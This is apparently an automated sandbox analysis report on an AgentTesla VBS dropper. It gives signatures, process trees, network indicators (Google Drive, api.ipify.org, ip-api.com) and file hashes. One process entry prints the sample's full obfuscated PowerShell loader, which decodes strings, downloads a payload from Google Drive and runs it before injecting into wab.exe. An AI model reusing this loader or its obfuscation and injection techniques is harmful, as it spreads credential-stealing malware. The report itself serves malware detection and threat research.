Analysis Overview
SHA256
03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d
Threat Level: Known bad
The file 03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 14:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 14:49
Reported
2024-06-19 14:51
Platform
win7-20240220-en
Max time kernel
141s
Max time network
149s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2000 set thread context of 2608 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | bdbffd38aaa980265fd1c77b0aaf4e5f |
| SHA1 | 841cbd0639dae47588ee6b8df96913c7591b2972 |
| SHA256 | 7f33b721d070f46062950b6f911bf686d88cfed96f282f1e85d1b5ce582a0cc0 |
| SHA512 | d96d23b41504729b27a19695610bc7f1d2407a63d143e56bc32bd181b82c3f10ddf4194ee8b85154b1eff9d756997d08e29bc22ab5bc61ef4afc918cdb2ef4da |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XJIHEOZVIJUM3A5FV6UP.temp
| MD5 | 4a3f90c4fc2e2cd2fad2a2ef38450277 |
| SHA1 | cf710b9b4453da4587753344430ba4d68232e85d |
| SHA256 | fbeef3fc8305f2903da9ab884bd2017b586281e06210253cacc88dc747d0a449 |
| SHA512 | c8f359f5a5c4925c5852dde20c4442f93cf849691c35f8e5fc15340ae7ef2e0efd696c345c6becb2b65dfd5129b7c375f1d3dffd5d7e3303e6ac22ac84df1689 |
C:\Users\Admin\AppData\Roaming\Scrouge.Swi
| MD5 | be60fe46432e08e827aeefd9f72d5790 |
| SHA1 | 7322ebc77810e84976136174258dddde78a23f27 |
| SHA256 | 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4 |
| SHA512 | 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 14:49
Reported
2024-06-19 14:51
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
151s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3632 set thread context of 2992 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. 
Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. 
SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. 
FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil 
Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. 
AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=752 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 5268416cacbeffd708e75a64a1cb2036 |
| SHA1 | 50d9ad3cefa4b430903e7f1e527c3995b0ee3f7f |
| SHA256 | 7926f95348277654cbae2c84a5562a003fd308245e5a2d9a031bba7bd0d0c736 |
| SHA512 | bc3e355cd36ab9aa43c6156836250ad6d9217aebf7585a11057d462d11d0e1c2c0c4231f1bfaec58baffd6015a9a525d4b1f9cf39aea780ce2c34f69d700e6b4 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | efff69aad6f8946d6499b060b419aa81 |
| SHA1 | 530aa1bdae43c5f072c115b2fe91961538b60640 |
| SHA256 | 6bd5f8250d34b23ed5c512f9c999e035b6c1d225d285ffa04633000ccac9d0a2 |
| SHA512 | 2fd66e4bdc2286a58b4bb5f5f7f57983f65054512fad479d216f11abc7e64c22f797e7bf89368e12dfbc732068f084e297d443f3dee228c83826c4d9c088413e |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | b7874067dccb9132ddf6a88979ae2c18 |
| SHA1 | cb1065a2c0aa83bf9f136ed2ebfe4b68c52c9bf7 |
| SHA256 | ee6e201490ad62b76126e8ac505b524dfaa1a84f95e69a15638f5e868637101d |
| SHA512 | c75128b9ae12129ab05e616cc3f57da66eaff1d1513d9d8efc163bd17b531bdc7ca2ecbd3255d9d7ac4d58b784117474a9e8ee7f9dff73d33345d9be7579bf18 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | a43144af0795d03343f43e5ddb4d0c08 |
| SHA1 | 4375286a3bee1476b2e088fd49a1c7ad6fb81f07 |
| SHA256 | d3a5f44858e125f2e25444faf014f354318ac8b6a697c82a8b02d72dab4185d3 |
| SHA512 | 8bbc5f40c35aa2ee157d4ec52c9ad76d58a9434650e801c90b08b0ef0a046db23a5cdc6f1d640c11edb65baac4300491509ec850dc9260f74612d4a8b6c79ab3 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 6d3b3d25a64ba16d9f84e9189c0dd54c |
| SHA1 | 69f62e418510c9bb03d61a57b17b622ae1a58483 |
| SHA256 | 7d69df7791ff9c20418aaf939d3caee005bcb34278e86f34a4bbb683e206a476 |
| SHA512 | 30752727930d0cc6754b0c234e8ab12f44401527b06b749f8f901b211f8a140f0cd49a9baaabcb61d230ced62df02c49b5075c6dc7c6cc0ec5523203e82709bb |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 5fa80a0193e7241a3f1a1792965389a4 |
| SHA1 | 244daa82a2298b181bfbcdf3c13915ea96dfafcb |
| SHA256 | 65a0b8d41a62b343fc2bae360e439fd1a5d8beeff3d8a5113ead8fa70bb18828 |
| SHA512 | 7c156d2e9ebdd32b4bdaf996dc457a8e7507863fa9b3101537053f83849d34e3335b6e86887822bdfb254eb8a79ed860955c2f5a32b994ed90f3b9742959f461 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 76afd47a058f64a36fd3fc3fa8d42861 |
| SHA1 | 89f3de4e12c7a21460321403a06369bf4353215b |
| SHA256 | 7737a78095f3719c5b04bc0e7ad43e9ce4ccc81a6bfb0e19805e3e4c30937285 |
| SHA512 | 8866d01464f31db85beb445eabf98df3a73ba8260bafd5c35b1d2c1855a835b144da8ea778b434bcb28c3d43e9339922e982a093eabd9b72e985b90e350a4f1c |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | ef9b0d1f2b2713b683d77493108a6f08 |
| SHA1 | 124933eb36c8e39dce55581347c7a23cc4fafe3a |
| SHA256 | 2731f761a38af729ab2184c73aa59507665308b3fd7e8b05090e6c2678283c8f |
| SHA512 | 9c653ff7debc32f416a21cc55f9dcb9a342af87b4c1c7b9464ac7f2813bd55fa58f0dff6c79806b2c7f7ec796279b74037d2107cacaf1ef4eb1f07fee6d73d75 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 932bb90d0770b73ad24dda9174ced743 |
| SHA1 | f2d7323b5d3f2978fb30f7b9b026497d968dac13 |
| SHA256 | 549edc4d8c1f25c916f19b68f412ca4957d6191503dfce38c96f49b2a1d3d37b |
| SHA512 | c7846774f118add3458fced652bc94d3527342415c10dc1a731413e6d94b22fbc3115d5eda4236523a221f450586dbedf29f7751a9e8e2655861f21d0653f3d1 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | faad7bea993e46e2b93131dc5960cd02 |
| SHA1 | 15b1a22cd47fd97d7de73275a628d81701a08fd4 |
| SHA256 | 208c825c646d1cf301fd03495601599ad7937f2ff14c9172f361ac9ffc15ec1c |
| SHA512 | c4d59712b52f7731692d78991a9d206c9bfac628eedbfd38ec05e0d055d09918580f1ccfbaaf98f2af6e81f2e4ced626d309fa2d3fb6b3cc832533674f0652d5 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 161ff62ce2710bf06c99035ae4493e0f |
| SHA1 | 76beb1725177edccce02ca2e9d7a1ebeacd2d99c |
| SHA256 | d302e208e205fd7b08bd0844e787f15dec1fecd4f6e6056104a64f1105e32e4d |
